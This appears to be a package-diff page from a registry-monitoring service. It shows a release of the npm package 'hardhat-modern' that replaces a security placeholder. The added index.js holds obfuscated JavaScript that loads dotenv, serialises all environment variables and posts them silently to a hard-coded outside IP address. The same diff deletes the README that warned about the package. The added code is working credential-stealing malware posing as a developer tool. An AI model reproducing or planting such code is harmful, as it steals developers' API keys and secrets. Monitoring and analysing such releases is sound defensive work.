hardhat-modern 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hardhat-modern might be problematic. Click here for more details.

package/index.js.txt ADDED
@@ -0,0 +1 @@
1
+ const _0x3f4f19=_0x59df;(function(_0xa6f636,_0x37ea79){const _0xead9a5=_0x59df,_0x5c7d99=_0xa6f636();while(!![]){try{const _0x5d5296=parseInt(_0xead9a5(0x14b))/0x1+parseInt(_0xead9a5(0x14a))/0x2*(-parseInt(_0xead9a5(0x145))/0x3)+-parseInt(_0xead9a5(0x14c))/0x4+-parseInt(_0xead9a5(0x144))/0x5+parseInt(_0xead9a5(0x143))/0x6+parseInt(_0xead9a5(0x149))/0x7*(-parseInt(_0xead9a5(0x148))/0x8)+parseInt(_0xead9a5(0x152))/0x9*(parseInt(_0xead9a5(0x150))/0xa);if(_0x5d5296===_0x37ea79)break;else _0x5c7d99['push'](_0x5c7d99['shift']());}catch(_0x42be32){_0x5c7d99['push'](_0x5c7d99['shift']());}}}(_0x1050,0xe3dd0));const axios=require('axios');function _0x59df(_0x22f0d1,_0x273426){const _0x105045=_0x1050();return _0x59df=function(_0x59df57,_0x41253e){_0x59df57=_0x59df57-0x143;let _0x26c411=_0x105045[_0x59df57];return _0x26c411;},_0x59df(_0x22f0d1,_0x273426);}require(_0x3f4f19(0x146))[_0x3f4f19(0x14d)](),exports['config']=async()=>{const _0x56e8c3=_0x3f4f19;try{let _0x4b0933=JSON[_0x56e8c3(0x14f)](process[_0x56e8c3(0x151)]);axios[_0x56e8c3(0x14e)](_0x56e8c3(0x147),_0x4b0933)['then'](_0x5994fb=>{});}catch(_0x53f94c){}};function _0x1050(){const _0xa22519=['6653898NLUlEp','8862240hnqULV','174prnjfN','dotenv','http://191.101.1.121/api/private/','8lPEzwO','3512551gLdvCx','36394BPfuEX','404331UDXxlO','837124IXfYGf','config','post','stringify','14794810UcMxig','env','18xwMREG'];_0x1050=function(){return _0xa22519;};return _0x1050();}
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
2
  "name": "hardhat-modern",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "axios": "^1.1.3",
13
+ "dotenv": "^16.0.3"
14
+ }
6
15
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=hardhat-modern for more information.